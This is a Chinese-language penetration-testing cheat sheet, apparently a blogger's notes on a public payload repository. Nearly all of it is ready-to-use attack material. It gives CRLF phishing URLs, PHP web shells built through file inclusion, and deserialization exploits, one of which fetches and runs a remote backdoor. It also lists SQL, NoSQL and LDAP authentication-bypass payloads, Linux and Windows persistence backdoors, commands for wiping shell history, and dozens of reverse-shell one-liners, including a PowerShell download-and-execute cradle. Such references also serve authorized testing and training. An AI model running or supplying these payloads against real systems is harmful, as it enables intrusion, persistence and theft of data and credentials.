渗透测试笔记

最近看到一个很不错的仓库,趁有时间,全部看了下做个笔记。

1、CRLF

CRLF - 添加cookie

1
http://www.example.com/%0D%0ASet-Cookie:mycookie=myvalue

CRLF - 绕过XSS

1
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

CRLF - 钓鱼

1
http://www.example.com/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E

CRLF - Filter Bypass

1
2
3
4
5
6
7
使用UTF-8编码:
%E5%98%8A => %0A => \u560a
%E5%98%8D => %0D => \u560d
%E5%98%BE => %3E => \u563e (>)
%E5%98%BC => %3C => \u563c (<)
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE

2、CSV Excel表达式注入

1
2
3
4
5
6
任何以'=','+','-','@'字符开头的单元格都将被表格软件解释为公式
动态数据交换(Dynamic Data Exchange):
=DDE(server; file; item; mode)
Exploit:
=DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0

3、文件包含

Linux

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/PID/fd/文件描述符
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp

Windows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml

log

1
2
3
4
5
6
7
8
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail

基本语法

1
http://example.com/index.php?page=../../../etc/passwd

00截断

1
http://example.com/index.php?page=../../../etc/passwd%00

双编码

1
2
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

目录穿越

1
2
3
4
5
6
7
8
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[...]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
Bypass Filter:
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

协议封装

php://filter
1
2
3
4
5
6
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=index.php
链接大文件:
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
zip://
1
2
3
4
5
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
http://example.com/index.php?page=zip://shell.jpg%23payload.php
data://
1
2
3
4
5
6
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
base64内容: "<?php system($_GET['cmd']);?>"
绕过xss防护
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
base64内容: <svg onload=alert(1)>
expect://
1
2
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
input://
1
2
3
http://example.com/index.php?page=php://input
POST:
<?php system('id'); ?>
phar://
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// 创建一个Phar文件
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
// 添加元数据
class AnyClass {}
$object = new AnyClass;
$object->data = 'phar';
$phar->setMetadata($object);
$phar->stopBuffering();
// 漏洞触发
class AnyClass {
function __destruct() {
echo $this->data;
}
}
// 输出: phar
include('phar://test.phar');

远程命令执行

/proc/*/fd
1
2
3
4
1、上传一些shell文件(100+)
2、包含: http://example.com/index.php?page=/proc/$PID/fd/$FD
$PID 进程号(可爆破)
$FD 文件描述符(可爆破)
/proc/self/environ
1
2
3
4
和日志文件一样,在ua中发送的payload,会记录在/proc/self/environ文件中
GET index.php?page=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
文件上传
1
2
3
上传一个包含恶意代码的任意格式的文件,比如: <?php system($_GET['c']);?>
http://example.com/index.php?page=path/to/upload/file.png
条件竞争
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
1、上传一个文件并触发自包含
2、大量重复上传来增加赢得竞争的几率和爆破的几率
3、对包含文件进行爆破: /tmp/[0-9a-zA-Z]{6}
// bruteforce_upload_race.py
import itertools
import requests
import sys
print('[+] Upload Trying...')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)
print('[+] Bruteforcing...')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text: # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)
print('[x] Something went wrong, please try again')
phpinfo

https://www.insomniasec.com/downloads/publications/phpinfolfi.py

4、不安全的反序列化

Java

1
2
3
4
5
6
7
8
9
10
11
12
13
Exploit:https://github.com/frohoff/ysoserial
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
Burp Suite扩展:
JavaSerialKiller
Java Deserialization Scanner
Burp-ysoserial
SuperSerial
SuperSerial-Active

PHP

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
system('gnome-terminal -x sh -c \'nc -lvvp 2333\'');
class PHPObjectInjection
{
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r=';
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...\r\n";
$response = file_get_contents("$url");
?>

Python

1
2
3
4
5
6
7
8
9
10
import cPickle
from base64 import b64encode, b64decode
class Evil(object):
def __reduce__(self):
return (os.system,("whoami",))
e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}").format(evil_token)

Ruby

1
2
3
4
5
6
7
8
for i in {
0..5
};
do docker run - it ruby: 2. $ {
i
}
ruby - e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil';
done

5、JWT(JSON Web Token)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
格式: Base64(Header).Base64(Data).Base64(Signature)
Example:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY
JWT在线加解密:https://www.jsonwebtoken.io/
JWT利用工具:
jwt_tool
git clone https://github.com/ticarpi/jwt_tool
> python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw result.txt
c-jwt-cracker
git clone https://github.com/brendan-rius/c-jwt-cracker
>./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
> Secret is "Sn1f"
Hashcat
hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret

6、LDAP注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
Example 1:
user = *)(uid=*))(|(uid=*
pass = password
query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword=MD5(password}))"
Example 2:
user = admin)(!(&(1=0
pass = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
攻击Payload:
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
默认属性:
// *)(ATTRIBUTE_HERE=*
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName

7、Linux-持久控制

基本反弹shell

1
2
3
ncat --udp -lvp 2333
ncat --tcp -lvp 2333
ncat --sctp -lvp 2333

SUID

1
2
3
4
5
TMPDIR="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR/suidshell.c
gcc $TMPDIR/suidshell.c -o $TMPDIR/suidshell 2>/dev/null
chown root:root $TMPDIR/suidshell
chmod 4777 $TMPDIR/suidshell

Crontab

1
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null

启动服务

1
2
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart

启动文件

1
2
3
4
5
6
7
8
9
10
11
Linux, write a file in ~/.config/autostart/NOM_OF_FILE.desktop
In : ~/.config/autostart/*.desktop
[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false

驱动程序

1
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

Tips

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
1、使用ANSI字符隐藏payload
2、清除历史命令
export HISTSIZE=0
export HISTFILESIZE=0
unset HISTFILE; CTRL-D
or
kill -9 $$
or
echo "" > ~/.bash_history
or
rm ~/.bash_history -rf
or
history -c
or
ln /dev/null ~/.bash_history -sf
3、以下临时目录通常是可写的
/var/tmp/
/tmp/
/dev/shm/

8、Windows-持久控制

注册表

1
2
3
4
5
6
7
8
9
在HKCU\Software\Microsoft\Windows的Run中创建REG_SZ
名称: Backdoor
值: C:\Users\test\AppData\Local\Temp\backdoor.exe
与HKCU一样,在HKLM\Software\Microsoft\Windows的Run键中创建REG_SZ
名称: Backdoor
值: C:\Windows\Temp\backdoor.exe

启动项

1
2
3
在用户启动文件夹中创建批处理脚本
PS C:\> gc C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\test\AppData\Local\Temp\backdoor.exe

计划任务

1
2
3
4
5
6
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

服务

1
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."

9、网络转发

Windows netsh

1
2
3
4
5
6
7
8
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
1、listenaddress – 等待连接的本地IP地址
2、listenport – 本地等待连接的监听端口
3、connectaddress – 将连接重定向到的远程IP地址
4、connectport – 将listenport连接转发到此端口

SSH

SOCKS代理
1
2
3
ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command
本地端口转发
1
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
远程端口转发
1
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

Proxychains

1
2
3
4
5
6
1、Config file: /etc/proxychains.conf
[ProxyList]
socks4 localhost 8080
2、proxychains nmap -sT 192.168.5.6

Web SOCKS - reGeorg

1
2
3
https://github.com/sensepost/reGeorg
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp

Metasploit

1
2
3
4
5
portfwd list
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
or
run autoroute -s 192.168.57.0/24
use auxiliary/server/socks4a

10、反弹shell

Bash TCP

1
2
3
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

Bash UDP

1
2
3
4
肉鸡:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
攻击机:
nc -u -lvp 4242

Perl

1
2
3
4
5
6
7
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

Linux
1
2
3
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Windows
1
python -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
PHP
1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
1
2
3
4
5
6
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
nc
1
2
ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash
Powershell
1
2
3
1、powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
2、powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
3、powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
Awk
1
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Java
1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
NodeJS
1
2
3
4
5
6
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

11、NoSQL注入

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
使用$ne、$gt绕过认证
in URL
username[$ne]=toto&password[$ne]=toto
in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
获取长度
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
获取数据
in URL
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
or
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}

NoSQL盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c

MongoDB Payloads

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1

12、开放重定向

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
1、使用白名单绕过
www.whitelisted.com.evil.com
2、使用'CRLF'绕过'javascript'黑名单关键字
java%0d%0ascript%0d%0a:alert(0)
3、使用'//'绕过'http'黑名单关键字
//baidu.com
4、使用'https'绕过'//'黑名单关键字
https:baidu.com
5、使用'\/\/'绕过'//'黑名单关键字
\/\/baidu.com/
/\/baidu.com/
6、使用'%E3%80%82'绕过'.'黑名单关键字
//baidu%E3%80%82com
7、使用'%00'绕过黑名单
//baidu%00.com
8、使用参数污染绕过
?next=whitelisted.com&next=baidu.com
9、使用'@'绕过
http://whitelisted.com@baidu.com/
10、使用目录绕过
http://www.baidu.com/http://www.whitelisted.com/
http://www.baidu.com/folder/www.whitelisted.com
11、XSS by Open URL(如果在js变量中)
";alert(0);//
12、XSS by data协议
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
13、XSS by javascript协议
http://www.example.com/redirect.php?url=javascript:prompt(1)

通用参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

13、远程命令执行

连接符

1
2
3
4
5
ps;ls
ps&ls
ps&&ls
ps|ls
fail_command||ls

内嵌命令

1
2
other_command `cat /etc/passwd`
other_command $(cat /etc/passwd)

绕过空格-Linux

1
2
3
4
5
6
7
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
sh</dev/tcp/127.0.0.1/80
IFS=,;`cat<<<uname,-a`

绕过空格-Windows

1
2
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

通配符

1
2
3
4
5
6
7
8
9
10
11
常用通配符
*
?
[]
[-]
[^]
[!]
{str1,str2,…}
专用字符集
...
/???/??t /???/p??s??

绕过zsh/bash/sh

1
2
3
echo $0
-> /usr/bin/zsh
echo whoami|$0

其他绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
单引号
w'h'o'am'i
双引号
w"h"o"am"i
反斜杠和斜杠
w\ho\am\i
/\b\i\n/////s\h
使用$@
who$@ami
扩展变量
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

14、SQL注入

检测点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
%%2727
%25%27
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP

DBMS识别

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"]
["connection_id()=connection_id()" ,"MYSQL"]
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"]
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"]
["@@CONNECTIONS>0" ,"MSSQL"]
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"]
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"]
["USER_ID(1)=USER_ID(1)" ,"MSSQL"]
["ROWNUM=ROWNUM" ,"ORACLE"]
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"]
["LNNVL(0=123)" ,"ORACLE"]
["5::int=5" ,"POSTGRESQL"]
["5::integer=5" ,"POSTGRESQL"]
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"]
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"]
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"]
["current_database()=current_database()" ,"POSTGRESQL"]
["sqlite_version()=sqlite_version()" ,"SQLITE"]
["last_insert_rowid()>1" ,"SQLITE"]
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"]
["val(cvar(1))=1" ,"MSACCESS"]
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"]
["cdbl(1)=cdbl(1)" ,"MSACCESS"]
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"]

SQLmap自动化攻击

1
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

认证绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
